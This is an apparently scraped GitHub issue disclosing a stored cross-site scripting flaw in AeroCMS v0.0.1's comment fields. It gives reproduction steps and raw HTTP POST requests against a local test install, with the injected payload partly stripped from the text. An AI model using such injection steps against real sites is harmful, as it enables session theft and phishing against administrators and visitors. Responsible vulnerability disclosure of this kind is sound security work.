AeroCMS icon indicating copy to clipboard operation
AeroCMS copied to clipboard

Published 20 hours ago verified publisher icon MegaTKC

Stored XSS Vulnerability on AeroCMS v0.0.1

Open rahadchowdhury opened this issue 1 year ago • 0 comments

Description: I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version: v0.0.1

Affected URL: http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. At first open any post.
  2. then fill up comments section and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://127.0.0.1 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Connection: close

comment_author=test&[email protected]&comment_content=test&create_comment=

  1. "comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://127.0.0.1 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Connection: close

comment_author=test">&[email protected]&comment_content=test">&create_comment=

1 2

  1. Now login admin panel and go to "Comments" Menu
  2. You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).

3 4 5

Proof of Concept: You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.

https://user-images.githubusercontent.com/41516016/224820020-0f0cc2cb-30a1-4722-9ef1-7c14133bf767.mp4

Impact: Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards Rahad Chowdhury Cyber Security Specialist https://www.linkedin.com/in/rahadchowdhury/

rahadchowdhury avatar Mar 13 '23 20:03 rahadchowdhury